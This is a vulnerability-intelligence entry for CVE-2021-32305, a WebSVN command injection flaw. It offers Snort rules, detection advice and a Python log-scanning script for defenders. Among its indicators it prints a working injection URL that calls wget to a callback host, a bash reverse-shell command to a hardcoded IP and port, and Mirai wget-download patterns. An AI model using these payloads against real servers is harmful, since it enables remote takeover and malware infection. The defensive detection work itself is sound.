CVE-2021-32305
published 2021-05-18

CVE-2021-32305: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

Priority: P1 (92)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Status: exploited in the wild (ITW exploit); VulnCheck KEV; initial access
EPSS: 86.72% (99.7th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
websvn | websvn | < 2.6.1 | 2.6.1

Detection & IOCs (extracted from sources)

url: /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22
path: /search.php?search=";
command: /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'
snort rule (SID 2033849):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|"; fast_pattern; reference:cve,2021-32305; classtype:attempted-admin; sid:2033849; rev:1; metadata:attack_target Server, created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_31, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)

snort rule (SID 2033857):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033857; rev:3; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)

snort rule (SID 2033856):
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033856; rev:4; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • The exploit targets the `search` parameter of `/search.php`. Monitor HTTP GET requests to this endpoint whose `search` value contains shell metacharacters, in particular the `";` sequence (URL-encoded `%22%3b`; written `|22 3b|` in the Snort rules above) used to break out of the quoted argument and inject OS commands.
  • In-the-wild Mirai payloads use the pattern `/search.php?search=|22 3b|/bin/bash+wget+http://` followed by an IPv4 address and then `|3b|+` within 50 bytes, as captured in ET SIDs 2033856 and 2033857.
  • Post-exploitation, the Mirai variant beacons outbound to its C2 on TCP port 666 using a custom text-based protocol; monitor for unusual outbound TCP connections to port 666 from web servers.
  • Dropped Mirai binaries are packed with a modified UPX packer, so standard UPX unpacking tools fail on them; static analysis or manual unpacking is required.
  • The attack drops binaries for 12 Linux architectures via a shell script that simply tries to execute every one of them. Look for mass downloads of multiple architecture-specific ELF binaries by a single web-server process shortly after a WebSVN search request.
  • Palo Alto Networks Threat Prevention Signature 91280 blocks exploitation of CVE-2021-32305; ensure this signature is active on perimeter NGFWs.
  • The vulnerable code path is in `include/svnlook.php` (function `getListSearch`) and `include/command.php` (function `runCommand`). The fix applies `escapeshellarg` to the search input before it is concatenated into the shell command. Verify that patched deployments actually contain this fix: the vulnerable parameter is user-controlled and reachable without authentication.
  • The exploit proof-of-concept uses a reverse-shell payload pointing at a hardcoded attacker IP (192.168.1.149:4444); real-world attacks substitute attacker-controlled infrastructure. Do not treat this IP as a production IOC.
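The first two bullets describe the request pattern to watch for. As an added example (not from the CVE record, WebSVN, or the ET rules), the following Python detector applies that pattern to constructed Apache-style access-log lines, decoding the `search` parameter so that both the percent-encoded and the literal forms of `";` are caught; the log lines and addresses are constructed placeholders.

```python
"""Flag WebSVN search requests carrying shell metacharacters (CVE-2021-32305).

Added example: scans Apache combined-format access-log lines for GET requests
to /search.php whose `search` parameter contains a shell metacharacter, which
is the same condition the ET rule content `|22 3b|` looks for on the wire.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that a legitimate WebSVN search term should not need.
# Tune this set for your environment if searches for such characters are common.
SHELL_META = re.compile(r'[;|&`$]')

# Minimal Apache combined-log parser: client, method, request URI, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def inspect_line(line):
    """Return a finding dict for a suspicious WebSVN search request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if not parts.path.endswith("/search.php"):
        return None
    # parse_qs percent-decodes, so %22%3b and a literal "; both reach the regex.
    for value in parse_qs(parts.query, keep_blank_values=True).get("search", []):
        if SHELL_META.search(value):
            return {"client": m.group("client"), "method": m.group("method"),
                    "status": m.group("status"), "search": value}
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    return [f for f in (inspect_line(line) for line in lines) if f]


# Constructed sample lines; 10.0.0.5 and the 198.51.100.x addresses are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2021:10:00:01 +0000] "GET /websvn/search.php?search=trunk HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Sep/2021:10:00:02 +0000] "GET /websvn/search.php?search=%22%3b/bin/bash+wget+http://198.51.100.9/x.sh%3b%22 HTTP/1.1" 200 88',
    '198.51.100.7 - - [01/Sep/2021:10:00:03 +0000] "GET /websvn/listing.php?path=%2Ftrunk HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the second sample line is reported: a benign search and a non-search.php request both pass, while the percent-encoded `";` prefix is decoded and matched.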

CVSS provenance

nvd v3.1: 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd v2.0: 10.0 CRITICAL AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck: 9.8 CRITICAL